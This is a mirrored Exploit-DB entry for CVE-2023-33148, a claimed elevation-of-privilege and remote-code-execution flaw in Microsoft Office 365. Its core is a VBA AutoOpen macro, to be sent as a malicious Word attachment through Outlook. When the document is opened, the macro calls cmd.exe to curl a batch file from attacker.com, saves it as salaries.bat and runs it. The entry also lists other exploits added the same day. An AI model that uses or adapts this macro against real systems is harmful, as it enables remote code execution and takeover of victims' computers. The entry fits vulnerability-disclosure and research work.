exploit-db-mirror/exploits/multiple/remote/51609.txt
Exploit-DB 98cdb05106 DB: 2023-07-21
10 changes to exploits/shellcodes/ghdb

Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE.

RWS WorldServer 11.7.3 - Session Token Enumeration

Aures Booking & POS Terminal - Local Privilege Escalation

Boom CMS v8.0.7 - Cross Site Scripting

PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities

pfSense v2.7.0 - OS Command Injection

Webile v1.0.1 - Multiple Cross Site Scripting

Wifi Soft Unibox Administration 3.0 & 3.1 - SQL Injection

RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)
2023-07-21 00:16:29 +00:00

43 lines
No EOL
1.3 KiB
Text

## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE.
## Author: nu11secur1ty
## Date: 07.18.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office
## Reference: https://portswigger.net/web-security/access-control
## CVE-2023-33148
## Description:
The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable to
Elevation of Privilege.
The attacker can use this vulnerability to attach a very malicious
WORD file in the Outlook app which is a part of Microsoft Office 365
and easily can trick the victim to click on it - opening it and
executing a very dangerous shell command, in the background of the
local PC. This execution is without downloading this malicious file,
and this is a potential problem and a very dangerous case! This can be
the end of the victim's PC, it depends on the scenario.
## Staus: HIGH Vulnerability
[+]Exploit:
- Exploit Server:
```vb
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s
https://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat
&& .\salaries.bat", vbNormalFocus)
End Sub
```
## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148)
## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html)
## Time spend:
00:35:00